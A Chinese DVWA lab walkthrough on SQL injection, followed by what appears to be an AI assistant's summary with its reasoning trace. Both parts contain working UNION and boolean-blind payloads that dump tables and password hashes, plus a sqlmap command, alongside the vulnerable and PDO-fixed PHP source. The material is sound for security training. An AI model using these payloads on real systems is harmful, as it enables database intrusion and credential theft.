DVWA学习(一)SQL Injection

本文深入解析SQL注入攻击,包括其工作原理、攻击分类及在不同安全级别下的实施方法。从低级到高级,展示了如何利用SQL语法漏洞获取敏感信息。

本文参考自https://www.jianshu.com/u/9dac23b54fba,根据自己的学习进度可能会有不同的地方,详细可以查看原文链接。

SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。
DVWA安全级别:LOW
  • 输入1:
    在这里插入图片描述
    • 输入1’:
      在这里插入图片描述
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
    
    可以知道这里的ID是单引号闭合。

(关于sql注入语句闭合的一些见解: https://blog.youkuaiyun.com/qiutyu/article/details/80314929)
一般的代码:id=_GET[‘id’];
sql=“SELECT * FROM users WHERE id=‘id’ LIMIT 0,1”;
就是这里,对id进行了修饰,用’(单引号)把id括了起来。所以我们构造语句的时候,一是要把我们构造的语句‘逃逸’出来,二是要把结构进行补全或者适当的注释。

  • 输入1’ or 1='1,显示了所有姓名和ID,可以知道是用了while循环显示(代入到id='id’中为id=‘1’ or 1=‘1’ )。url为http://127.0.0.1/vulnerabilities/sqli/?id=1%27+or+1%3D%271&Submit=Submit#
    在这里插入图片描述

  • 获取字段长

    1’ union select 1-- k报错:SELECT语句中使用具有不同数目的列。说明表的字段数不为1。
    The used SELECT statements have a different number of columns

    1’ union select 1,2-- k正常显示,1,2号位也正常显示出来

    在这里插入图片描述
    url为http://127.0.0.1/vulnerabilities/sqli/?id=1%27+union+select+1%2C2--+k&Submit=Submit#

  • 显示数据库名

    1’ union select 1,database()-- k,2号位显示数据库名为dvwa。

    在这里插入图片描述
    url为http://127.0.0.1/vulnerabilities/sqli/?id=1%27+union+select+1%2Cdatabase%28%29--+k&Submit=Submit#

  • 爆表:

    1’ union select 1,group_concat(0x3e,table_name) from information_schema.tables where table_schema=‘dvwa’ – k

    在这里插入图片描述

  • 爆列:

    1’ union select 1,group_concat(0x3e,column_name) from information_schema.columns where table_schema=‘dvwa’ – k

    在这里插入图片描述

  • 爆出所有用户名和密码,根据之前爆表获取到的表明users,以及爆列获取到的列名user, password。

    0’ union select user, password from users – k

    在这里插入图片描述

low.php源码,没有任何过滤,最基本的SQL注入。


if( isset( $_REQUEST[ 'Submit' ] ) ) {
	// Get input
	$id = $_REQUEST[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

	mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

Medium级别

输入框变成了下拉框
在这里插入图片描述

可以查看元素知道name=id,post表单,可以用burp抓包改id或者用hackbar。
在这里插入图片描述
在这里插入图片描述

使用HackBar插件,选择POST发送方式,id=1’发现单引号被转义了,执行无效。
在这里插入图片描述

id=1 or 1=1&Submit=Submit显示所有ID和姓名,可以判断是数字型。
在这里插入图片描述

注入的分类
注入的分类:数字型和字符型。攻击者目的只有一点,那就是绕过程序的限制,使用户输入的数据带入数据库执行,利用数据库的特殊性获取更多的信息或者更大的权限。
1、数字型注入
当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。
2、字符型注入
当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

其余方法和LOW难度一样
在这里插入图片描述
medium.php源码:


if( isset( $_POST[ 'Submit' ] ) ) {
	// Get input
	$id = $_POST[ 'id' ];

	$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

	$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Display values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

High难度

变成了在另外一个窗口提交ID到该页面,是字符型注入。
在这里插入图片描述

在这里插入图片描述
其余步骤和上面差不多
High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止一般的sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入。
High.php源码:

if( isset( $_SESSION [ 'id' ] ) ) {
	// Get input
	$id = $_SESSION[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);		
}
?>

与Medium难度相比High难度没有转义函数,在SQL语句后面添加了一个limit,限制输出结果为1条。虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。

安全级别: Impossible

源码:


if( isset( $_GET[ 'Submit' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$id = $_GET[ 'id' ];

	// Was a number entered?
	if(is_numeric( $id )) {
		// Check the database
		$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
		$data->bindParam( ':id', $id, PDO::PARAM_INT );
		$data->execute();
		$row = $data->fetch();

		// Make sure only 1 result is returned
		if( $data->rowCount() == 1 ) {
			// Get values
			$first = $row[ 'first_name' ];
			$last  = $row[ 'last_name' ];

			// Feedback for end user
			$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
		}
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>

添加了token机制,防止CSRF攻击。
SQL语句使用
PDO机制预处理语句
PHP PDO 预处理语句与存储过程
原理:两次传输,前一次传一个sql模板,第二次传查询参数,会把第二步传入的参数只做查询参数处理,不做语义解释,这样注入的条件就算执行了,也不会得到查询结果。
划清了代码与数据的界限,可以确保不会发生SQL 注入。(然而,如果查询的其他部分是由未转义的输入来构建的,则仍存在 SQL 注入的风险)。

<think>我们正在讨论DVWA中的SQL注入攻击。根据用户提供的引用,特别是引用[1]和[2],我们知道DVWASQL注入关卡分为不同安全级别(LOW, MEDIUM, HIGH, IMPOSSIBLE),并且攻击方法包括UNION注入ERROR注入(针对非盲注)以及BOOLEAN盲注(针对盲注)。同时,引用[3]和[4]提到了些防御措施,比如限制查询结果数量(LIMIT 1)以及分离查询提交页面和结果页面来防御自动化工具(如sqlmap)。 用户要求了解DVWASQL注入攻击的步骤和原理详解。我们将按照以下结构进行回答: 1. SQL注入原理简介 2. DVWA SQL Injection(非盲注)攻击步骤(针对LOW, MEDIUM, HIGH级别) 3. DVWA SQL Injection (Blind)(盲注)攻击步骤(针对LOW, MEDIUM, HIGH级别) 4. 防御措施分析(IMPOSSIBLE级别) 注意:在描述攻击步骤时,我们将结合引用[2]中的示例(获取dvwa数据库的所有表名)以及其他常见的注入技术。 由于引用中提到了使用手工注入sqlmap,但TIME注入耗时太久未采用,因此我们将重点放在UNION注入ERROR注入和BOOLEAN盲注上。 开始回答:</think>### DVWA SQL注入攻击步骤与原理详解 DVWA(Damn Vulnerable Web Application)是款专为安全测试设计的漏洞演练平台。以下针对其SQL注入漏洞(非盲注/盲注)的攻击步骤与原理进行详解,结合LOW、MEDIUM、HIGH安全级别的实践方法,并引用相关技术点[^1][^2][^3][^4]。 --- #### **SQL注入原理** **核心漏洞**:攻击者通过篡改输入参数,破坏原始SQL语句结构,执行恶意查询。 **数学表达**: 设原始查询为: $$Q = \text{SELECT * FROM users WHERE id = } \color{red}{\text{'$input'}}$$ 当输入为 `1' UNION SELECT 1,table_name FROM information_schema.tables#` 时,实际执行语句变为: $$Q_{\text{malicious}} = \text{SELECT * FROM users WHERE id = '1' UNION SELECT 1,table_name FROM information_schema.tables#'}$$ 导致数据库返回敏感信息(如表名、字段值)。 --- #### **二、非盲注攻击步骤(SQL Injection)** 适用于页面直接返回查询结果的场景。 ##### **1. LOW级别** **漏洞点**:未过滤用户输入,直接拼接SQL语句[^1]。 **攻击步骤**: 1. **探测列数**(UNION注入前提): ```sql 1' ORDER BY 3# -- 尝试列数,直到报错(如ORDER BY 4报错则列数为3) ``` 2. **联合查询获取数据**(引用[2]示例): ```sql 1' UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='dvwa'# ``` - `1` 为占位符,匹配原始查询列数 - `information_schema.tables` 为系统表,存储所有表名 - `table_schema='dvwa'` 限定目标数据库 ##### **2. MEDIUM级别** **漏洞点**:输入参数改为数字型(无引号),但未过滤[^3]。 **攻击步骤**: 1. **绕过数字型检测**: ```sql 1 UNION SELECT 1,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='dvwa'# ``` - 无需闭合引号,直接拼接UNION ##### **3. HIGH级别** **漏洞点**:分离查询与结果页面(防自动化工具),但未过滤输入[^4]。 **攻击步骤**: 1. **利用Burp Suite绕过页面分离**: - 拦截查询请求 → 修改参数为注入语句 → 转发获取响应 ```sql 1' UNION SELECT user,password FROM users# ``` - 通过结果页面查看敏感数据(如密码哈希值) --- #### **三、盲注攻击步骤(SQL Injection Blind)** 适用于页面无直接数据返回,但可通过布尔或时间差异判断结果。 ##### **1. BOOLEAN盲注(常用)** **原理**:根据页面返回内容差异(真/假)推断数据。 **攻击步骤**(以获取数据库名为例): 1. **判断数据库名长度**: ```sql 1' AND LENGTH(DATABASE())=4# -- 若页面返回正常,则库名长度为4 ``` 2. **逐字符猜解**: ```sql 1' AND SUBSTRING(DATABASE(),1,1)='d'# -- 验证首字母是否为'd' ``` - 使用 `SUBSTRING()` 或 `MID()` 函数截取字符 ##### **2. sqlmap自动化利用** **适用场景**:手工注入效率低时(如MEDIUM/HIGH级别)。 **命令示例**: ```bash sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \ --cookie="PHPSESSID=xxx; security=medium" \ --batch --dbs ``` - `--dbs`:列举所有数据库 - `--tables -D dvwa`:列举dvwa库的所有表 > **注意**:HIGH级别因页面分离需配合Burp抓包(`--proxy=http://127.0.0.1:8080`)[^4]。 --- #### **四、防御机制分析(IMPOSSIBLE级别)** **安全代码原理**: 1. **预处理语句(Prepared Statements)**: ```php $stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id"); $stmt->bindParam(':id', $id, PDO::PARAM_INT); // 强制类型为整数 ``` - 输入参数与SQL逻辑分离,杜绝拼接 2. **Token验证**: - 每次提交需携带CSRF Token,阻止自动化工具重放攻击[^3] --- ### 总结 | 安全级别 | 注入方式 | 关键技巧 | |----------|-------------------|-----------------------------------| | LOW | UNION/ERROR注入 | 闭合单引号,联合查询系统表[^2] | | MEDIUM | 数字型UNION注入 | 省去引号,直接UNION | | HIGH | 工具绕过+手工注入 | Burp Suite拦截修改请求[^4] | | IMPOSSIBLE | 防御生效 | 预处理语句+Token验证 | > 实践提示: > - 非盲注优先用UNION查询(高效) > - 盲注推荐BOOLEAN注入(避免耗时TIME注入)[^1] > - 遇到页面分离时,手动工具结合(Burp+sqlmap)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值